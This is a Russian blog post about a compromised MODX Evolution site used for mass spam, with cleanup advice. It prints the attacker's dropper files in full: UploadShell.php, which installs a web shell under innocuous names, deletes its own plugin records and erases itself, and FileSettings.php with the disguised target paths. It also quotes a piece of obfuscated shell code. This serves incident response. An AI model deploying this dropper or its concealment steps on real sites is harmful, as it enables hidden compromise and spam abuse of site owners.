MODX Evo: Массовая рассылка корреспонденции (SPAM).

Вернуться назад

Служба мониторинга сервисов хостинг провайдера известила, что один из моих сайтов рассылает спам. При проверке сайта на наличие вредоностного кода, антивирусы промолчали. Пришлось воспользоваться гуглом. По данной проблеме MODX Evo: Массовая рассылка корреспонденции (SPAM) информации набралось не так уж много. На сайте одного из MODx сообществ решался аналогичный вопрос "Похоже тоже взломали. Пошли письма". Т.е. на сайт был загружен Shell, который производил массовую рассылку СПАМА.

Похоже тоже взломали. Пошли письма.

Один из участников сообщества поделился некими ранее обнаружившимися несколькими интересными файлами через которые все это безобразие заливается.

UploadShell.php


<?php

require_once $_SERVER['DOCUMENT_ROOT'].'/assets/cache/temp/FileSettings.php';
$file = file_get_contents($filePath);
$res = file_put_contents($uploadPath, $file);

global $modx;
$pluginsTable = $modx->getFullTableName("site_plugins");
$result = $modx->db->query("SELECT id FROM $pluginsTable WHERE name = 'exp' ");
$count = mysql_num_rows($result);

if ($count > 0) {
        $row = $modx->db->getRow($result);
        
        if ($row['id']) {
                $pluginDel = $modx->db->query("DELETE FROM $pluginsTable WHERE name = 'exp' ");

                $eventsTable = $modx->getFullTableName("site_plugin_events");
                $id = $row['id'];
                $eventDel = $modx->db->query("DELETE FROM $eventsTable WHERE pluginid = $id ");

                $modx->clearCache();
        include_once MODX_BASE_PATH . "manager/processors/cache_sync.class.processor.php";
        $sync = new synccache();
        $sync->setCachepath(MODX_BASE_PATH . "assets/cache/");
        $sync->setReport(false);
        $sync->emptyCache();
        }
}

unlink($filePath);
unlink($_SERVER['DOCUMENT_ROOT'].'/assets/cache/temp/FileSettings.php');
unlink($_SERVER['DOCUMENT_ROOT'].'/assets/cache/temp/UploadShell.php');

echo $res;
die();

FileSettings.php


<?php

# $uploadBasePath = '/manager/processors/kill.processor.php';
# $uploadBasePath = '/assets/images/logo.php';
# $uploadBasePath = '/manager/includes/lang/country/murug_country.inc.php';
 $uploadBasePath = '/lang.php';
# $uploadBasePath = '/manager/media/style/MODxCarbon/images/icons/index.php'; # 7c39_0303.php
# $fileBaseName = '841rewb3v4x.php';
 $fileBaseName = 'lang.php';

$uploadPath    = $_SERVER['DOCUMENT_ROOT'].$uploadBasePath;
$filePath          = $_SERVER['DOCUMENT_ROOT'].'/assets/cache/temp/'.$fileBaseName;
$localFilePath = '/var/www/jonin/data/www/niblocklogistics.com/retro2/protected/commands/'.$fileBaseName;

Решение

Проверить папки с путями, что указаны в коде. Удалить файлы, что указаны в коде. Файлы Shell'а содержат обфусцированый код ${"\x47L\x4f\x42\x41\x4c\x53"}["\x68u\x77\x69\x76\x63\x61\x71wk\x79\x79"] ... Так же необходимо удалить папку temp, которая лежит assets/cache/.


# $uploadBasePath = '/manager/processors/kill.processor.php';
# $uploadBasePath = '/assets/images/logo.php';
# $uploadBasePath = '/manager/includes/lang/country/murug_country.inc.php';
 $uploadBasePath = '/lang.php';
# $uploadBasePath = '/manager/media/style/MODxCarbon/images/icons/index.php'; # 7c39_0303.php
# $fileBaseName = '841rewb3v4x.php';
 $fileBaseName = 'lang.php';

После того, как вы удалили вредоносные файлы Shell'a. Пройдите следующую процедуру.

Произведите BackUp всего проекта и Базы Данной.
Обновите Вашу систему управления до последней актуальной версии.
Смените пароль FTP доступа.
В файл htaccess добавить правило


Order Deny,Allow
Deny from 80.243.184.227
Deny from 77.59.166.128
Deny from 146.185.239.19

Голосов: 1990

Параметры getImageList MIGX Создание страницы с ошибкой 404 в MODX Revolution RESTful API в MODX Rrevolution Создание тегов, меток или хэштегов в MODx Документация по pdoCrumbs Документация по pdoPage Документация по pdoMenu Настраиваем турбо-страницы Yandex в MODx Revo Авторизация через соц.сети в MODX: hybridauth Условия в MODx Revo сниппет IF Документация MIGx По шаговое обновление Modx Revolution до последней версии Документация по pdoResources Форматирование даты в MODx Revo Облако тегов в MODX revolution Перенос MODX Revolution на хостинг или с домена на домен Настройка ЧПУ и htaccess для MODX Revolution MODX - Добавление reCaptcha в FormIt и Login Работа с ресурсами в MODx revolution Вывод даты MODx Revo Документация по getResources Как создать карту сайта в MODX Revo Проcтая форма обратной связи на MODx Revolution + FormIt Как сделать меню на MODx при помощи Wayfinder MODx Revo - поиск по сайту SimpleSearch modx Быстрый старт в MODX Revolution MODX Evo: Массовая рассылка корреспонденции (SPAM).

Возможно, вам будет интересно

Документация по pdoMenu

pdoMenu - сниппет генерации меню. Может заменять Wayfinder, и позволяет более гибко указывать параметры. Например, умеет строить меню сразу из нескольких родителей, отображая их как вместе, так и отдельными ветками.

Читать подробнее

Перенос MODX Revolution на хостинг или с домена на домен

Все, кто использует систему управления сайтом MODx Revolution сталкивались с проблемой переноса сайта на хостинг. В данной статье описан способ переноса сайта MODx Revo на хостинг.

Читать подробнее

Создание страницы с ошибкой 404 в MODX Revolution

Для нормальной индексации содержимого сайта поисковыми системами крайне важно создать страницу с 404 ERROR.

Читать подробнее

Как сделать меню на MODx при помощи Wayfinder

Недавно меня попросили пофиксить баг с меню на одном сайте – некоторые пункты упорно не хотели выстраиваться в ряд, а вместо этого вылезали в неожиданных местах страницы при наведении курсора. Баг заключался не в кривом css, как я предположила сначала, а в криво настроенном вызове Wayfinder.

Читать подробнее